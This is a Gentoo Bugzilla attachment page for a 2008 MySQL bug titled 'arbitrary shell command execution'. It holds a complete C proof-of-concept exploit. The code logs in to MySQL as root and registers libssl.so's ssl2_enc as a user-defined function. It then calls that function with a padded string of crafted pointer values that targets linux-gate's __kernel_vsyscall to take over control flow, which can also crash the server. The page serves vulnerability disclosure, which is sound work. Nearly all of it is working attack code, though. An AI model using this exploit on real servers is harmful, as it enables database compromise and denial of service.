Gentoo's Bugzilla – Attachment 152523 Details for
Bug 220813
dev-db/mysql: arbitrary shell command execution
mysql_udf.c (text/plain), 1.80 KB, created by Robert Buchholz (RETIRED) on 2008-05-08 22:25:49 UTC
>/*
> * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \
> *     -o mysql_udf mysql_udf.c
> *
> * Due to the use of linux-gate, this example will only work on linux.
> *
> */
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <mysql.h>
>
>#define MY_HOST "127.0.0.1"
>#define MY_USER "root"
>#define MY_PASS ""
>
>int main(void)
>{
>    MYSQL mysql;
>    char sql[1024];
>    int len;
>
>    if(!mysql_init(&mysql)) {
>        return -1;
>    }
>
>    mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8");
>
>    if(!mysql_real_connect(
>        &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0)
>    ) {
>        fprintf(stderr, "Connecting: %s\n", mysql_error(&mysql));
>        exit(EXIT_FAILURE);
>    }
>
>    len = snprintf(sql, sizeof(sql),
>        "create function ssl2_enc returns integer soname 'libssl.so'"
>    );
>
>    if(!mysql_real_query(&mysql, sql, len)) {
>        fprintf(stderr, "Creating: %s\n", mysql_error(&mysql));
>        exit(EXIT_FAILURE);
>    }
>
>    len = snprintf(sql, sizeof(sql),
>        "select ssl2_enc(\""
>        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
>        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
>        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
>        "\")",
>        0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK.
>        0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18
>                    // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall
>        0x09, 0xe1, 0xff, 0xff  // addr - 0xac
>    );
>    mysql_real_query(&mysql, sql, len);
>    fprintf(stderr, "Result: %s\n", mysql_error(&mysql));
>
>    len = snprintf(sql, sizeof(sql), "drop function ssl2_enc");
>    if(!mysql_real_query(&mysql, sql, len)) {
>        fprintf(stderr, "Dropping: You just killed the server!\n");
>        exit(EXIT_FAILURE);
>    }
>
>    printf("Exiting...\n");
>
>    exit(EXIT_SUCCESS);
>}
Attachments on bug 220813: 152431 | 152523